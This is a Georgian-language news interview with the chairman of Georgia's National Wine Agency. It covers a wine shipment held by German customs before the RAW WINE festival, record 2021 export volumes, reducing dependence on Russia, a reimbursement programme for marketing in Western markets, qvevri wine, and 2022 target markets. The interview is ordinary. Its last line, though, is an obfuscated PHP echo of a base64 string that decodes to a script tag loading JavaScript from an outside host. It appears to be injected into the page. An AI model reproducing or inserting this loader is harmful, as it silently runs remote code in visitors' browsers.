celsiusi
ავერსი საქკაბელი
საინფორმაციო სააგენტო BUSINESS TIME-ი გთავაზობთ ინტერვიუს ღვინის ეროვნული სააგენტოს თავმჯდომარე ლევან მეხუზლასთან.
 
ბატონო ლევან, პირველ რიგში მინდა დავიწყოთ საუბარი ბუნებრივი ღვინოების საერთაშორისო ფესტივალ „RAW WINE”-თან დაკავშირებული საკითხით. აღნშნულ ღონისძიებაზე ქართული ღვინის წარდგენა ვერ მოხერხდა, რასაც სხვადასხვა კრიტიკული შეფასებები მოჰყვა. რომ გვითხრათ, რეალურად რა მოხდა და რატომ დაგვიანდა საქართველოდან ფესტივალზე წარსადგენი ღვინის მიწოდება?
 
ღვინის წარდგენა ვერ მოხერხდა არ არის სწორი. ამ ღონისძიებაზე ქართული ღვინო წარდგენილი იყო, მეტიც, საკმაოდ წარმატებული აღმოჩნდა კომპანიებისთვის ეს გამოფენა. ამის შესახებ თავად კომპანიის წარმომადგენლებმაც ისაუბრეს. რამდენიმეს პოტენციური დამკვეთი გამოუჩნდა, რამდენიმე ქვეყნის მიმართულებით. ზოგადად, ეს უხერხულობა იმის გამო შეიქმნა, რომ ღვინოების წაღება კომპანიებს თავად მოუხდათ, ზოგს ხელბარგით, ზოგს კი იქ დახვდა ღვინოები, იმპორტიორების მიერ გამოყოფილი ნიმუშების სახით. ხოლო, რაც შეეხება საქართველოდან გაგზავნილ ღვინოებს, ტვირთი, გამოფენამდე ოთხი დღით ადრე ჩავიდა გერმანიაში, გაჩერებული იქნა გერმანული საბაჟოს მიერ, და რატომღაც გერმანულმა მხარემ გადაწყვიტა “წითელი კორიდორის” მეშვეობით ამ ტვირთის მიიღება, რაც იმას ნიშნავს დეტალურად მოხებოდა ტვირთვის დათვალიერება. ინსპექტირების პროცესი ჯერ კიდევ არ დასრულებულა გერმანიის მხარის მიერ. ჩვენ აღნიშნულზე განცხადება გავავრცელეთ და იმაზე მეტის თქმა არ შემიძლია.
 
ვინაიდან ვსაუბრობთ ქართული ღვინის პოპულარიზაციაზე და ამ მხრივ სხვადასხვა ღონისძიებებში მონაწილეობაზე, რომ შევაჯამოთ 2021 წელი, რომელ გამოფენას გამოყოფდით განსაკუთრებულად, რომელიც შედეგობრივად ყველაზე საინტერესო და პროდუქტიული აღმოჩნდა?
 
ზოგადად, 2021 წელი მაინც გამოწვევებით აღსავსე წელი იყო იმ მხრივ, რომ სამწუხაროდ ბოლომდე არ არის განვლილი კოვიდ-პანდემია, ძალიან ხშირად დაგეგმილი ღონისძიებები ერთი კვირით ადრე უქმდებოდა და ეს უკავშირდებოდა რა თქმა უნდა, პანდემიას. ყველაზე დიდი სირთულე, რაც ახლავს ამ ყველაფერს არის ის, რომ პროგნოზების კეთება და დროში გაწერილი დაგეგმვა რთულია. მიუხედავად ამ სირთულეებისა, შედეგობრივად მაინც წარმატებული იყო წელი. მიმდინარე წლის იანვარ-ნოემბერში საქართველოდან ექსპორტირებულია 96,150,065 ბოთლი ღვინო, რაც დამოუკიდებელი საქართველოს პერიოდში ისტორიულად მაღალ მაჩვენებელს წარმოადგენს. ვფიქრობთ, წელს პირველად გადავაჭარბებთ ას მილიონიან ბოთლ ღვინოს ექსპორტირებას. რაც შეეხება გამოფენებს, ისეთი დიდი და გლობალური, რომლებიც ღვინის სექტორში არის "პრო ვაინი” (ProWein) და "ვაინ ექსპო" (VinExpo) - ეს ორი გლობალური გამოფენა არ შედგა, ისევ და ისევ პანდემიის გამო. თუმცა, ვემზადებით უკვე 2022 წლის "პრო ვაინისთვის”, რომელიც ტრადიციულად გაზაფხულზე ტარდება. შედარებით აქტიურობა გამოფენების მხრივ იყო წლის მეორე ნახევარში, მათ შორის, სასიხარულოა ის, რომ საქართველოშიც მოხერხდა ორი ძალიან კარგი გამოფენის ორგანიზება, ერთი - მთაწმინდაზე ჩატარდა "ახალი ღვინის ფესტივალი", მეორე კი - დიდუბის საგამოფენო ცენტრში WinExpo Georgia. ეს გამოფენები შედეგიანი და კარგი იყო. გამოფენების გარდა, მნიშვნელოვანია, რომ ჩვენ სტრატეგიულ ბაზრებზე სხვა საშუალებებითაც ვმოქმედებთ, როგორიცაა ონლაინ პლატფორმები, დეგუსტაციების მოწყობა, ნიმუშების მიწოდება დისტრიბუტორებისთვის, იმპორტიორებისთვის. ასე რომ, ეს წელი მიუხედავად არსებული გამოწვევებისა, ძალიან პროდუქტიულად და პოზიტიურად სრულდება.
 
დივერსიფიცირებული ექსპორტი
 
პანდემიამ მსოფლიო შეცვალა და შესაბამისად, პრიორიტეტებიც შეიცვალა. ქართული ღვინის საექსპორტო ბაზრის დივერსიფიკაცია ერთ-ერთი პრიორიტეტული მიმართულებაა ღვინის ეროვნული სააგენტოსთვის. რა სურათი გვაქვს დღეს ამ მხრივ და რამდენად დინამიურია რუსეთის ბაზარზე დამოკიდებულების შემცირების ტემპი?
 
რუსეთის ბაზარზე დამოკიდებულება ჯერ კიდევ 10-15 წლის განმავლობაში 80-85% იყო, ახლა უკვე რუსეთის წილი ქართული ღვინის ექსპორტში 60%-ზე ქვევით არის. მე როდესაც ვამბობ, რომ ღვინის ექსპორტი 14%-ით გაიზარდა, უნდა აღინიშნოს, რომ რუსეთის მიმართულებით ზრდა მხოლოდ 4% შეადგენს. ნელ-ნელა მეტად დივერსიფიცირებული ხდება ბაზრები. თუმცა, ვთვლით რომ ამ მხრივ ჯერ კიდევ ბევრია სამუშაო. აქ მხოლოდ რუსეთზე არაა საუბარი, არცერთ ერთ კონკრეტულ ბაზარზე დამოკიდებულება არ არის კარგი. სახელმწიფო პროგრამა "ქართული ღვინის პოპულარიზაციისთვის" რომელიც 2013 წლიდან მოქმედებს, ის თავიდანვე ისევე იყო შექმნილი, რომ ყველგან ვაწყობდით ღონისძიებებს, მარკეტინგულ აქტივობებს, გარდა “დსთ” ქვეყნებისა, ანუ, არცერთი თეთრი ჩვენი ბიუჯეტის არ იხარჯება “დსთ” ქვეყნების მიმართულებით. ვფიქრობ, რომ მეტი აქტივობაა საჭირო კერძო სექტორის მხრიდან, რომლებსაც ლოჯისტიკური, კულტურული თუ ისტორიული მომენტების გათვალისწინებით, “დსთ” ბაზარზე უადვილდებათ მარკეტინგული ღონისძიებების ჩატარება. ეს გასაგებია, მაგრამ ვფიქრობ რომ მოვიდა დრო, მათაც გადააფასონ თავიანთი პრიორიტეტები, თავიანთი ფასეულობები და მეტად გარისკონ დასავლეთის ბაზრების მიმართულებით, სწორედ ამ ქვეყნებში მარკეტინგის მიმართულებით ჩადონ ინვესტიციები. ამ მხრივ, მოგეხსენებათ, რომ "ქართული ღვინის პოპულარიზაციის" ფარგლებში ახალ კომპონენტს ვამატებთ, რაც გულისხმობს მარკეტინგული აქტივობების უკვე შემდგომში ანაზღაურებას, თუ კერძო სექტორის მხრიდან იქნება დახარჯული არა “დსთ” ქვეყნებზე. ამ პროგრამის იდეაა - მეტი დივერსიფიცირება ბაზრის, მეტი აქტივობების გაწევა სტაბილურ დასავლეთის ბაზრებზე. ამ წლის მონაცემებს თუ გადახედავთ, ნახავთ რომ ბოლო რამდენიმე თვის მონაცემებით, ნელ-ნელა მაგრამ კლებულობს რუსეთის წილი ქართული ღვინის ექსპორტში. ბოლო თვეების მონაცემებით, 1%-ით კლებულობს რუსეთის წილი, შეიძლება ეს ციფრი არ ჩანდეს ისე მასშტაბურად, მაგრამ როდესაც 100 მილიონია ექსპორტი, ეს 1%- - მილიონ ბოთლ ღვინოა. მოხარული ვართ, რომ ექსპორტის ზრდა ხდება უფრო სხვა სტრატეგიული ბაზრების ხარჯზე და არა “დსთ” ქვეყნების საშუალებით.
 
მინდა უფრო განვავრცოთ პროგრამა "ქართული ღვინის პოპულარიზაციაში" ახალი კომპონენტი, რომელიც არა “დსთ" ქვეყნის ბაზრებზე მარკეტინგული აქტივობების დაფინანსებას გულისხმობს...
 
ქართული ღვინის საექსპორტო პოტენციალის გაზრდის მიზნით, 2021 წლის სექტემბერში საქართველოს მთავრობამ „ქართული ღვინის პოპულარიზაციის ხელშეწყობის სახელმწიფო პროგრამა“ დაამტკიცა.
 
პროგრამის მიზანია საერთაშორისო ბაზრებზე ქართული ღვინის საექსპორტო პოტენციალის, კონკურენტუნარიანობისა და ცნობადობის გაზრდა, სტრატეგიული და პრიორიტეტული საექსპორტო ბაზრების დივერსიფიცირება. შესაბამისად, კომპანიებს ახლა აქვთ დაახლოებით 6 თვე იმისათვის, რომ შეაფასონ ამ პროგრამის არსი, დამატებით თუ რაიმე შეკითხვები გაუჩნდებათ მათ, ჩვენ ყოველთვის მზად ვართ გავცეთ პასუხები. მათ უნდა წარმოადგინონ განაცხადები, სურვილი ამ პროგრამაში მონაწილეობისათვის. პროგრამის სტრუქტურა ისეთია, რომ საბოლოოდ ანაზღაურება ხდება კომპანიისთვის პოსტ ფაქტუმ, ანუ მას შემდგომ, რაც ისინი მარკეტინგისთვის დახარჯავენ გარკვეულ ფინანსურ სახსრებს. ეს ხარჯი უნდა იყოს ეფექტური, ისე არა, რომ დავხარჯე და შედეგი, რაც არი - არის! ყველანაირად უნდა ეცადონ, რომ შედეგი დადონ და მათი ექსპორტი გაიზარდოს, გაიზარდოს არა “დსთ” ქვეყნებში. ამ ორ პირობას თუ დააკმაყოფილებენ და დახარჯავენ დასავლურ ბაზარზე მარკეტინგისთვის გარკვეულ თანხას, ჩვენ მათ ავუნაზღაურებთ, საუბარია ერთ-ერთი პარამეტრების თანახმად ექსპორტირებულ ბოთლზე 2 ლარამდე ანაზღაურდეს. (რედ.: დეტალები შეგიძლიათ აქ ნახოთ: https://wine.gov.ge/Ge/Files/Download/14205)
 
თქვენ ისაუბრეთ ანაზღაურების პირობებზე, მათ ეფექტური მარკეტინგული კამპანია უნდა ჩაატარონ, რათა გარკვეულწილად აუნაზღაურდეთ დახარჯული თანხა. ვინ გაზომავს ეფექტურობას და კიდევ, მარკეტინგი ზოგ შემთხვევაში მყისიერ შედეგებს არ იძლევა...
 
მადლობა ამ კითხვისთვის. ეს საკითხი გათვალისწინებულია პროგრამაში. ფულის ხარჯვა და შედეგი რამდენიმე თვით არის განაცვლებული, კერძოდ, საანგარიშო პერიოდი, რომელიც გათვალისწინებულია მთავრობის განკარგულებით მთავრდება 1 ოქტომბერს, ხოლო საექსპორტო წელი ემთხვევა კალენდარულ წელს. ამ შედეგისთვის კომპანიებს კიდევ რამდენიმე თქვე აქვთ მიცემული.
 
თუმცა, ბატონო ლევან, ექსპორტში ზრდა არის ღვინის სააგენტოს მიერ ჩატარებული აქტივობების შედეგი, მე ჩემს კითხვაში ვგულისხმობდი, არა ღვინის ეროვნული სააგენტოს ქოლგის ქვეშ ჩატარებულ ღონისძიებებში კერძო სექტორის აქტიურობაზე, არამედ რამდენად აქტიურია კერძო სექტორი თქვენგან დამოუკიდებლად პარტნიორის მოძიების თვალსაზრისით?
 
მე ვფიქრობ, საჭიროც არის და იყო ღვინის ეროვნულ სააგენტოს გარკვეული ლოკომოტივის როლი შეესრულებინა. უბრალოდ, იმის თქმა მინდა, რომ არიან კომპანიები, რომლებიც საფრთხეების დაზღვევისა და გათვალისწინებიდან გამომდინარე საკუთარი პროდუქციის ექსპორტს გარკვეული მოცულობის იქით არ ახორციელებს რუსეთში. მიუხედავად იმისა, რომ რუსეთიდან მათ პროდუქციაზე დიდი მოთხოვნაა. მათ ურჩევნიათ დივერსიფიცირება ბაზრის და ასეთ პოლიტიკას ახორციელებენ, რაც, რა თქმა უნდა, მხოლოდ მისასალმებელია. ამ მხრივ ტენდენცია კარგი გვაქვს, ის კომპანიებიც კი, რომლების ძირითადი საექსპორტო ორიენტირი რუსეთი იყო, ახდენენ ნელ-ნელა ევროპულ ბაზრებზე ორიენტაციას, მეტიც ჩინეთის მიმართულებითაც დივერსიფიცირებას ახდენენ. ამ მხრივ, ვფიქრობ დადებითი ეფექტი ექნება ახალ პროგრამას და ამ მიმართულებით კომპანიები უფრო გაბედულები იქნებიან მარკეტინგში.
 
ქვევრის ღვინის პერსპექტივები 
 
ასევე საინტერესოა, თუ როგორი დამოკიდებულებაა საერთაშორისო ბაზრებზე ქვევრის ღვინის მიმართ, რა პერსპექტივებს ხედავთ ამ ტიპის ღვინის და რამდენად დიდია ინტერესები ამ მხრივ?
 
პირდაპირ გეტყვით, რომ ამ ეტაპზე ქვევრის ღვინო არის დასავლურ ბაზრებზე ერთ-ერთი სიახლე და ჩვენთვის უპირატესობა კონკურენციის თვალსაზრისით. ძალიან ბევრი ტრადიციული ქვეყანა, იტალიაში, ავსტრიაში, გერმანიაში, პორტუგალიაშიც კი მინახავს ესეთი ჭურჭელი სხვადასხვა სახელებით და ცდილობენ ჩვენი ქვევრის ღვინის სტილში შექმნან პროდუქტი. თვითონ ქვევრის ღვინის აღიარება მოხდა 2020 წელს, ეს იყო ერთ-ერთი ყველაზე მნიშვნელოვანი ამ პანდემიურ წელიწადში. ქვევრის ღვინო ძალიან კარგი პროდუქტია საქართველოს წარსადგენად ღვინის მსოფლიო ინდუსტრიაში, ინტერესის გასაღვიძებლად. თუმცა, ჩვენი ქვეყანა მარტო ქვევრის ღვინის ქვეყანა არაა, ჩვენ სხვა ღვინოებიც გვაქვს ძალიან მაღალი ხარისხის.
 
რაც შეეხება კონკურენციას, რამდენად უწევს ქართული ღვინო დღეს საერთაშორისო ბაზარზე კონკურენციას იტალიურს, ფრანგულს და ა.შ. ღვინოებს როგორც ხარისხით, ასევე ფასით?
 
ამ კითხვაზე ძალიან გულწრფელად გიპასუხებთ, რომ ჯერ-ჯერობით ამ მხრივ ლიდერია საფრანგეთი, როგორც ფასით ისე ხარისხით, თუმცა მე ვფიქრობ, რომ ამას დრო სჭირდება, რადგან საქართველოს აქვს პოტენციალი, მათ შორის ფრანგულ ღვინოებსაც გაუწიოს კონკურენცია. ძალიან ხშირად უწევს კიდევაც, ერთი რამ, რაც მინდა ვისარგებლო შემთხვევით და ვთქვა, რომ ჩვენი კონკურენტული უპირატესობა ვერასოდეს ვერ იქნება ფასი, იქიდან გამომდინარე, რომ უბრალოდ არ გვაქვს საშუალება არც ფართობების და არც რელიების, რომ მასიური მოხმარების ოდენობის ღვინო ვაწარმოოთ. საქართველოსთვის არის ძალიან მნიშვნელოვანი უნიკალურობა, როგორც ხარისხით, ასევე ტექნოლოგიებით, უნიკალურ ჯიშებზე, უნიკალურ კლიმატურ პირობებზე, მგონია, რომ ამ მხრივადაც საკმაოდ კონკურენტუნარიანები ვართ გლობალურ ბაზარზე და ჩვენი ნიშა გვიჭირავს.
 
წარმატების მოლოდინში
 
და ბოლოს, რა გეგმები აქვს ღვინის ეროვნულ სააგენტოს 2022 წლისთვის, რა მიმართულებები იქნება პრიორიტეტული?
 
ტრადიციულად ჩვენ გარკვეულ ბაზრებზე ვიქნებით ძალიან აქტიური, როგორიც არის დიდი ბრიტანეთი, გერმანია, ბალტიისპირეთი, იაპონია, ჩინეთი, განსაკუთრებით მინდა ავღნიშნო ამერიკის შეერთებული შტატები, იმიტომ, რომ ამერიკის შეერთებული შტატებში ვაფართოვებთ ჩვენ მოღვაწეობას, წელს ჩვენ გვექნება ამერიკულ ბაზარზე მილიონ ბოთლიანი ექსპორტი. ამის საფუძველზე, მოვიდა დრო, რომ მეტი ზრდა დავაშენოთ ამერიკის შეერთებული შტატების მიმართულებით და ფართომასშტაბიან კამპანიას დავიწყებთ. ასევე უნდა ავღნიშნო, რომ უნდა ვცადოთ ბედი და სიახლე იქნება სამხრეთ კორეის მიმართულება. ძალიან საინტერესო ბაზარია, ჩვენი შეფასებით, გარკვეული აქტივებები გვსურს დავიწყოთ ბენელუქსის ქვეყნების მიმართულებით, ბელგია, დანია და ჰოლანდიაში.
 
იმედს ვიქონიებ, რომ ის დიდი ფორუმები, რომელიც ორი წელია არ ტარდება მომავალ წელს აღდგება. 2022 წელს, 10%-ნი ექსპორტის ზრდას შევინარჩუნებთ, უფრო მეტი თუ არა. წინ ძალიან საინტერესო წელი გველოდება.
 
 
 
 
1476
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");